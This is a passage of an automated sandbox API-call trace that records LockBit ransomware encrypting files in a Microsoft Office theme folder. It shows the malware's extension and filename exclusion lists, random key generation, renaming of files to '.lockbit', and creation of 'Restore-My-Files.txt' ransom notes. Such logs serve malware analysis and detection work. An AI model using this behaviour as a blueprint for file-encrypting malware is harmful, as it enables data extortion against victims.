lpString2="Oriel.eftx") returned -1 [0195.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="Oriel.eftx") returned -1 [0195.219] lstrcmpiW (lpString1="autorun.inf", lpString2="Oriel.eftx") returned -1 [0195.219] lstrcmpiW (lpString1="thumbs.db", lpString2="Oriel.eftx") returned 1 [0195.219] lstrcmpiW (lpString1="iconcache.db", lpString2="Oriel.eftx") returned -1 [0195.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned=".eftx" [0195.219] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.219] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.220] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.220] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.220] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.220] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.220] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.lockbit") returned 86 [0195.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.222] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.222] malloc (_Size=0x40068) returned 0x3df0008 [0195.222] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43193) returned 1 [0195.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.223] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.228] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.228] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0195.230] free (_Block=0x1fa2ed8) [0195.230] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.230] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.230] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.231] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28903500, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x28903500, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x9fed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin.eftx", cAlternateFileName="ORIGIN~1.EFT")) returned 1 [0195.231] lstrcmpiW (lpString1=".", lpString2="Origin.eftx") returned -1 [0195.231] lstrcmpiW (lpString1="..", lpString2="Origin.eftx") returned -1 [0195.231] PathFindExtensionW (pszPath="Origin.eftx") returned=".eftx" [0195.231] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.231] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.231] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.232] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.232] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.232] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.232] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.232] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.232] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.233] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Origin.eftx") returned 1 [0195.233] lstrcmpiW (lpString1="ntldr", lpString2="Origin.eftx") returned -1 [0195.233] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Origin.eftx") returned -1 [0195.233] lstrcmpiW (lpString1="bootsect.bak", lpString2="Origin.eftx") returned -1 [0195.233] lstrcmpiW (lpString1="autorun.inf", lpString2="Origin.eftx") returned -1 [0195.233] lstrcmpiW (lpString1="thumbs.db", lpString2="Origin.eftx") returned 1 [0195.233] lstrcmpiW (lpString1="iconcache.db", lpString2="Origin.eftx") returned -1 [0195.233] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.233] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned=".eftx" [0195.233] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.233] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.233] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.233] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.233] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.233] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.234] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.234] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.lockbit") returned 87 [0195.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.236] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.236] malloc (_Size=0x40068) returned 0x3df0008 [0195.236] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=40941) returned 1 [0195.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.237] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.242] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.242] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.244] free (_Block=0x1fa2ed8) [0195.244] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.244] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.244] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.244] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c23bc00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bf0a20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2c23bc00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x37d8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paper.eftx", cAlternateFileName="PAPER~1.EFT")) returned 1 [0195.244] lstrcmpiW (lpString1=".", lpString2="Paper.eftx") returned -1 [0195.244] lstrcmpiW (lpString1="..", lpString2="Paper.eftx") returned -1 [0195.244] PathFindExtensionW (pszPath="Paper.eftx") returned=".eftx" [0195.244] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.244] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.244] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.244] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.244] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.244] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.244] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.245] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.245] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.246] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Paper.eftx") returned 1 [0195.246] lstrcmpiW (lpString1="ntldr", lpString2="Paper.eftx") returned -1 [0195.246] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Paper.eftx") returned -1 [0195.246] lstrcmpiW (lpString1="bootsect.bak", lpString2="Paper.eftx") returned -1 [0195.246] lstrcmpiW (lpString1="autorun.inf", lpString2="Paper.eftx") returned -1 [0195.246] lstrcmpiW (lpString1="thumbs.db", lpString2="Paper.eftx") returned 1 [0195.247] lstrcmpiW (lpString1="iconcache.db", lpString2="Paper.eftx") returned -1 [0195.247] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.247] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned=".eftx" [0195.247] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.247] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.247] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.248] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.248] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.lockbit") returned 86 [0195.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.249] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.249] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.250] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=228746) returned 1 [0195.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.251] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.256] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.257] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0195.264] free (_Block=0x1fa2ed8) [0195.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.264] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.264] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x537a8900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c16b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x537a8900, 